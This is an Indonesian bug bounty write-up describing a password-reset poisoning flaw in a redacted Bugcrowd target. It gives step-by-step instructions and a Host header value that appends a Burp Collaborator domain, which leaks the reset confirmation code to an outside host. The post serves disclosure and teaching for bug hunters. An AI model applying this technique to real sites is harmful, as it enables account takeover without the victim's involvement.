Assalamu’alaikum wr. wb.
Salam semangat untuk sobat progress dimanapun anda berada, kembali lagi bersama saya rootbakar yang akan berbagi postingan-postingan menarik terkait Bug Bounty.
Oke pada kesempatan yang baik kali ini saya akan membagikan postingan terkait temuan saya pada salah private program di Bugcrowd. Untuk dapat melihat daftar program Bug Bounty yang tersedia bisa langsung mengakses pada halaman Bugcrowd
SUMMARY
Sedikit penjelasan terkait kerentanan yang saya temukan ini yaitu bagaimana seorang attacker dengan mudahnya mengarahkan atau memposisikan link dalam proses forgot password ke burp collaborator yang kemudian link tersebut leak pada burp collaborator.
Attacker dengan mudahnya mengetahui link tersebut dan tampilannya persis seperti yang masuk ke email target, attacker tinggal mengeksekusi link tersebut pada browser miliknya untuk melakukan reset password.
Nah yang unik disini memposisikan link pada host bukan dengan cara mengganti value dari host itu sendiri melainkan dengan menambahkan link burp collaborator setelah value dari host tersebut seperti di bawah ini
Host: redacted.com.i8r1k8hdu0xly9tcvzkvifht6kca0z.burpcollaborator.net
Lebih jelas silahkan lihat poc dibawah ini
POC
1. Pilih menu forgot password
2. Masukkan email victim dan setelah mengisi email victim lalu intercept dengan menggunakan Burp Suite
3. Pada Host tambahkan link burp collaborator setelah link website redacted.com seperti di bawah ini
Host: redacted.com.i8r1k8hdu0xly9tcvzkvifht6kca0z.burpcollaborator.net
4. Forward request dan cek burp collaborator dan booommm,, confirmation code berhasil terlihat dan attacker langsung bisa melakukan forgot password tanpa harus mengecek email dari victim
NOTE: Ketika saya mencoba langsung untuk merubah value host menjadi domain lain ini mengalami kegagalan dan walaupun saya menambahkan header X-Forwarded-Host: tetap mengalami kegagalan dan saya sedikit terkejut ketika menambahkan “.” dot diikuti link burp collaborator dan berhasil, sungguh di luar ekspektasi saya 🙂
SCREENSHOT
IMPACT
Mengambil alih akun user lain tanpa interaksi dari user yang bersangkutan
TIMELINE
- Report: 22 Agustus 2020
- Triage: 24 Agustus 2020
- Rewards: 25 Agustus 2020
- Status: Unresolved
TIMELINE SCREENSHOT
Terimakasih sudah menyempatkan untuk membaca postingan saya ini semoga menginspirasi dan membantu kalian dalam menemukan bug-bug serupa pada program yang ada di platform Bugcrowd atau lainnya dan Jangan lupa sempatkan sedikit waktunya untuk subscribe youtube kami yah di Progress28. Salam semangat dan Happy Hunting